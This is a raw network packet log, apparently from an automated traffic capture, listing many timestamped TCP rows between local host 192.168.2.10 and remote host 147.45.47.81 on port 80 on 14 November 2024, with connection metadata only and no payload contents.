                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594218969 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594229937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594244957 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594258070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594268084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594288111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594297886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594309092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594319105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594330072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594341040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594352007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594362020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594372988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594388008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594399929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594409943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594422102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594432116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594443083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594455004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594527006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594537973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594548941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594561100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594590902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594618082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594633102 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594633102 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594646931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594660044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594671011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594686031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594697952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594710112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594722986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594805956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594819069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594830036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594841003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594851017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594862938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594872952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594885111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594897032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594907999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594918966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594932079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594957113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594975948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594988108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.594999075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595016956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595027924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595037937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595047951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595058918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595069885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595079899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595092058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595102072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595113039 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595129967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595139980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595150948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595161915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595171928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595182896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595194101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595197916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595197916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595197916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595199108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595199108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595199108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595199108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595199108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595210075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595220089 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595223904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595236063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595246077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595246077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595246077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595247984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595256090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595261097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595272064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595283031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595371008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595371008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595516920 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595535994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595547915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595557928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595567942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595580101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595590115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595601082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595612049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595623970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595633984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595654011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595664024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595674038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595685005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595695972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595707893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595719099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595729113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595740080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595751047 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595761061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595772028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595782042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595793009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595803022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595814943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595825911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595835924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595846891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595858097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595869064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595879078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595899105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595910072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595921040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595931053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595942020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595940113 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595956087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595968008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595969915 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595978975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595993042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595993042 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595993042 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.595993042 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596034050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596045017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596055984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596065998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596076965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596088886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596100092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596110106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596121073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596132040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596142054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596307993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596318960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596330881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596342087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596352100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596358061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596369028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596457958 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596470118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596479893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596491098 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596502066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596513033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596523046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596535921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596545935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596555948 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596566916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596584082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596597910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596607924 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596627951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596638918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596649885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596659899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596671104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596668005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596683025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596688986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596694946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596703053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596712112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596726894 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596738100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596749067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596759081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596770048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596781015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596793890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596803904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596815109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596827030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596837997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596875906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596887112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596898079 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596909046 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596920013 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596930981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596942902 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596965075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596975088 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.596986055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597003937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597016096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597127914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597138882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597157955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597168922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597179890 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597191095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597202063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597210884 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597248077 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597258091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597261906 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597261906 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597270966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597282887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597294092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597305059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597315073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597326994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597337008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597347975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597385883 CET8049957147.45.47.81192.168.2.10
